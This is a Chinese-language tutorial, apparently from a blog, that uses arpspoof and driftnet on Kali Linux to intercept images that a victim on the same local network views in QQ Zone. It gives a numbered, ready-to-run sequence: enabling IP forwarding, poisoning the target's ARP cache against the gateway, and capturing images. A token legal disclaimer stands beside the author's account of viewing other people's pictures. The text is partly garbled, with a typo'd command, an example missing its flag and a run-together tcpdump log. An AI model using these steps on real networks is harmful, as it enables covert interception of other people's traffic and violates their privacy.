ARP欺骗技术-获取内网目标IP访问QQ空间的图片

首先声明:请不要接触法律。
要求:
虚拟机
Kali linux系统

命令“
查ip命令:ifconfig
echo写命令是不回显
driftnet 获取本机网卡》网卡》查看网卡的图片信息


例如攻击目标ip:192.168.1.100        网关:192.168.1.1

欺骗语句“
Arpspoof -i 网卡 -t 目标ip        网关
例如:arpsp00f -i eth0        192.168.1.100        192.168.1.1

以下两句请理解:
Arp 欺骗
目标ip        流量经过我的网卡,从网卡关出去


Arp断网
目标ip流量经过我的网卡

sudo tcpdump -vvPassword:tcpdump: data link type PKTAPtcpdump: listening on pktap, link-type PKTAP (Packet Tap), capture size 262144 bytes18:12:59.200002 IP (tos 0x0, ttl 34, id 0, offset 0, flags [+], proto TCP (6), length 1500)183.131.34.28.http > 10.129.239.77.55153: Flags [.], seq 13388572:13390032, ack 394374277, win 528, length 1460: HTTP18:12:59.200330 IP (tos 0x0, ttl 34, id 0, offset 1480, flags [+], proto TCP (6), length 1500)183.131.34.28 > 10.129.239.77: tcp18:12:59.200332 IP (tos 0x0, ttl 34, id 0, offset 2960, flags [+], proto TCP (6), length 1500)

第一步“开启ip转发”
命令:echo 1 > /proc/sys/net/ipv4/ip_forward        (回车没有任何的返回)

第二步“开始欺骗”
命令:arpspoof -i eth0 -t 192.168.1.108 192.168.1.1        (回车之后不断欺骗运行中~~~[记得这个窗口需要保留])

第三步“查看目标的图片信息”弹出的窗口请不要关闭,在窗口就可以看到获取信息。
命令:driftnet -i eth0

第四步我在逛一下别人的空间获取到的图片。

作者:系统正在维护~~
作者QQ:730380689       
本文章是給需要的人。


 
 

你可能感兴趣的:(ARP欺骗技术-获取内网目标IP访问QQ空间的图片)